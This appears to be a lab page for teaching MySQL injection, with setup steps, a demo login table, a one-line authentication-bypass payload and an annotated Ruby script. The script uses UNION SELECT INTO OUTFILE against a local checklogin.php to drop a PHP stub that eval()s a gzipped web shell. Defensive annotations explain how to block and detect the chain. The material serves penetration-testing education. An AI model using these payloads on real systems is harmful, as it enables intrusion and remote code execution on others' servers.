MySQL Injection
Setup
Install the lamp stack:
sudo tasksel install lamp-server
Copy files:
Project Files www (place in /var/www/)
also in the sql_i_files.rar archive: screenshots, papers detailing complex SQLi attacks, the SQL DB, and my presentation
Add database:
mysql -u root -p pen_test < pen_test_db.sql
Database
-- Schema of the demo login table that checklogin.php queries and that the
-- script further down injects into. The empty-string defaults (default '')
-- appear to have been swallowed by wiki markup, leaving "default ,".
mysql> CREATE TABLE members (
-> id int(4) NOT NULL auto_increment,
-> username varchar(65) NOT NULL default ,
-> password varchar(65) NOT NULL default ,
-> admin BOOL NOT NULL default 0,
-> PRIMARY KEY (id) );
-- Passwords are stored in clear text (see the select output below). A real
-- application should store a salted hash, which also limits what a
-- UNION-based read of this table discloses.
-- NOTE(review): three values are supplied for a four-column table; MySQL
-- normally rejects this unless the columns are listed, yet the row below
-- shows admin = 0, so the statement actually run was presumably different.
mysql> INSERT INTO members VALUES(1,'john','1234');
mysql> select * from members; +----+----------+----------+-------+ | id | username | password | admin | +----+----------+----------+-------+ | 1 | john | 1234 | 0 | +----+----------+----------+-------+
Simple Attack
user: anything' or '1'='1
password: anything' or '1'='1
Complex Attack
See http://maxsobell.com/wp/wp-content/uploads/2009/12/Weaponized-SQLi.pdf
#!/usr/bin/ruby
# Companion script for the "Complex Attack" section above. It drives the
# checklogin.php form of the demo app on localhost, whose 'mypassword' field
# is spliced into a SQL query unescaped: the injected value closes the quote
# and appends UNION SELECT ... INTO OUTFILE / INTO DUMPFILE, so it is the
# database server, not the web application, that writes a file under
# /var/www/upload/.
#
# Why it works, and what breaks the chain (defender's notes):
#   - a parameterized query / prepared statement for the login lookup makes
#     the quote break-out in 'mypassword' inert;
#   - INTO OUTFILE / INTO DUMPFILE require the MySQL FILE privilege on the
#     account the web app connects with, plus a directory mysqld can write
#     to and the web server will execute — a least-privilege DB account,
#     secure_file_priv, and a web root that mysqld cannot write to each
#     stop it;
#   - the PHP stub written by the injection calls eval() on the contents of
#     a .gz file, so a file-integrity check on the upload directory and a
#     query log search for OUTFILE/DUMPFILE are natural detection points.
require 'ftools'      # removed in Ruby 1.9 (FileUtils replaced it); dates this script to 1.8
require 'net/http'
require 'multi'       # not stdlib: presumably the Multipart helper from the Stack Overflow answer linked below — verify
require 'zlib'
# Interactive menu: "1" uploads the payload through upload.php first,
# "2" delivers everything through the SQL injection alone.
puts "Choose an exploit:\n"
puts "(1) using upload\n"
puts "(2) using SQLi\n"
choice = gets.chomp
if choice == "1" then
## upload the payload
upload_url = URI.parse('http://localhost/upload.php')
## compress the original shell file:
# Reuse a previously built /tmp/payload.gz; otherwise gzip the PHP shell
# found in /var/www/tools into that path.
if File.exist?('/tmp/payload.gz') then
file = File.open('/tmp/payload.gz')
else
if File.exist?('/var/www/tools/phpshell_to_encode.php') then
to_encode = File.read('/var/www/tools/phpshell_to_encode.php')
else
puts 'Oops, where\'s the file to encode\? Put it in /var/www/tools/'
exit
end
Zlib::GzipWriter.open('/tmp/payload.gz') do |gz|
gz.write to_encode
gz.close   # redundant with the block form, which closes the writer on exit
end
end
## from http://stackoverflow.com/questions/184178/ruby-how-to-post-a-file-via-http-as-multipart-form-data
# Build a multipart/form-data body; the field name 'uploaded' has to match
# what upload.php reads. The upload response (res) is never inspected.
data, headers = Multipart::Post.prepare_query('uploaded' => file)
http = Net::HTTP.new(upload_url.host, upload_url.port)
res = http.start {|con| con.post(upload_url.path, data, headers) }
## inject the file opener
# Second request: the injected UNION SELECT has MySQL write a small PHP stub
# next to the uploaded payload.gz. The stub gunzips 5715 bytes (presumably
# the compressed payload's size — cannot confirm from here) and eval()s
# them. MySQL only performs the write when the DB account holds FILE.
url = URI.parse('http://localhost/checklogin.php')
post_args = {
'myusername' => "anything",
'mypassword' => "' union select \"<?php $gzfile = 'payload.gz';$gzhandle = gzopen($gzfile, 'rb');$zipped_content = gzread($gzhandle,5715);gzclose($gzhandle);eval($zipped_content);?>\" INTO OUTFILE '/var/www/upload/payload.php"
}
resp, data = Net::HTTP.post_form(url, post_args)   # two-value destructuring is the Ruby 1.8 idiom; later versions return only the response
elsif choice == "2" then
## inject the payload in gz form
# No upload.php needed: the first injection makes MySQL write the gzipped
# payload itself via INTO DUMPFILE (the literal is elided in this copy of
# the page); the second writes the same PHP stub, pointed at payloadh.gz.
url = URI.parse('http://localhost/checklogin.php')
post_args = {
'myusername' => "anything",
'mypassword' => "' union select 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 into dumpfile '/var/www/upload/payloadh.gz"
}
resp, data = Net::HTTP.post_form(url, post_args)
## inject the file opener
post_args = {
'myusername' => "anything",
'mypassword' => "' union select \"<?php $gzfile = 'payloadh.gz';$gzhandle = gzopen($gzfile, 'rb');$zipped_content = gzread($gzhandle,5715);gzclose($gzhandle);eval($zipped_content);?>\" into outfile '/var/www/upload/payloadh.php"
}
resp, data = Net::HTTP.post_form(url, post_args)
end
# Prints the body of the last checklogin.php response. resp is unset when
# the menu choice was neither "1" nor "2", and the closing message names
# payload.php although the SQLi-only branch writes payloadh.php.
puts resp.body + "\n\n"
puts "Visit http://localhost/upload/payload.php\n\n"
